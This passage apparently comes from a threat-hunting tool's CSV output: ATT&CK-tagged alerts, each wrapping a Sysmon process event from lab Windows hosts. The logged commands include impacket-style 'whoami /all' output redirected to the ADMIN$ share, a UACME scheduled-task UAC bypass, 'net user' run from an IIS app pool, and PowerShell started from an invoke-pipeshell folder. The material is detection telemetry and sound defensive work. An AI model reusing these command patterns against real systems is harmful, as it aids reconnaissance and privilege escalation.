<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami /all ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:35:13.543589Z"">
</TimeCreated>
<EventRecordID>9840</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:35:13.527</Data>
<Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-00108DC71E00</Data>
<Data Name=""ProcessId"">692</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami /all </Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
<Data Name=""LogonId"">0x1ea3c6</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B181-5CC8-0000-001023C41E00</Data>
<Data Name=""ParentProcessId"">1256</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-20T22:35:26.755693Z"">
</TimeCreated>
<EventRecordID>422746</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3408"" ThreadID=""4448"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-20 22:35:26.747</Data>
<Data Name=""ProcessGuid"">747F3D96-662E-5F8F-0000-001023353800</Data>
<Data Name=""ProcessId"">6748</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Provider Host</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\NETWORK SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-E130-5F8F-0000-0020E4030000</Data>
<Data Name=""LogonId"">0x3e4</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">840</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237545.570757,2020-08-12T17:05:45.570757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:05:36.555348Z"">
</TimeCreated>
<EventRecordID>342408</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:05:36.545</Data>
<Data Name=""ProcessGuid"">747F3D96-E920-5F33-0000-001043920A00</Data>
<Data Name=""ProcessId"">5128</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E914-5F33-0000-001009990500</Data>
<Data Name=""ParentProcessId"">5144</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1564825609.40255,2019-08-03T13:46:49.402550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /run /tn &quot;\Microsoft\Windows\DiskCleanup\SilentCleanup&quot; /i ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T09:46:48.924858Z"">
</TimeCreated>
<EventRecordID>5133</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-08-03 09:46:48.842</Data>
<Data Name=""ProcessGuid"">747F3D96-5808-5D45-0000-0010D1FE3E00</Data>
<Data Name=""ProcessId"">1268</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /run /tn &quot;\Microsoft\Windows\DiskCleanup\SilentCleanup&quot; /i</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
<Data Name=""LogonId"">0x18d3fb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
<Data Name=""ParentProcessGuid"">747F3D96-5808-5D45-0000-00106CDC3E00</Data>
<Data Name=""ParentProcessId"">924</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
<Data Name=""ParentCommandLine"">UACME.exe 34</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.543589,2019-05-01T00:35:13.543589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:35:13.512339Z"">
</TimeCreated>
<EventRecordID>9839</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:35:13.512</Data>
<Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-001023C41E00</Data>
<Data Name=""ProcessId"">1256</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
<Data Name=""LogonId"">0x1ea3c6</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
<Data Name=""ParentProcessId"">3572</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-24T01:33:53.182587Z"">
</TimeCreated>
<EventRecordID>1046</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-24 01:33:53.152</Data>
<Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-00102DA1AC00</Data>
<Data Name=""ProcessId"">788</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net user</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
<Data Name=""LogonId"">0x9cf992</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7</Data>
<Data Name=""ParentProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
<Data Name=""ParentProcessId"">2404</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami /all ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.371714Z"">
</TimeCreated>
<EventRecordID>9829</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.356</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010373E1D00</Data>
<Data Name=""ProcessId"">3328</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami /all </Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
<Data Name=""ParentProcessId"">2828</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-24T01:33:53.182587Z"">
</TimeCreated>
<EventRecordID>1046</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-24 01:33:53.152</Data>
<Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-00102DA1AC00</Data>
<Data Name=""ProcessId"">788</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">net user</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
<Data Name=""LogonId"">0x9cf992</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7</Data>
<Data Name=""ParentProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
<Data Name=""ParentProcessId"">2404</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-12-04T22:41:04.470207Z"">
</TimeCreated>
<EventRecordID>549016</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3560"" ThreadID=""4600"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-12-04 22:41:04.465</Data>
<Data Name=""ProcessGuid"">747F3D96-BB00-5FCA-0000-001033CD7600</Data>
<Data Name=""ProcessId"">8536</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-3407-5FCB-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">612</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.819347Z"">
</TimeCreated>
<EventRecordID>341</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.675</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-001032047C00</Data>
<Data Name=""ProcessId"">1656</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ParentProcessId"">3412</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) ran Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile) and Parent Image : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-29T20:59:21.539311Z"">
</TimeCreated>
<EventRecordID>8048</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1896"" ThreadID=""1820"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-29 20:59:21.539</Data>
<Data Name=""ProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
<Data Name=""ProcessId"">3376</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\invoke-pipeshell-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
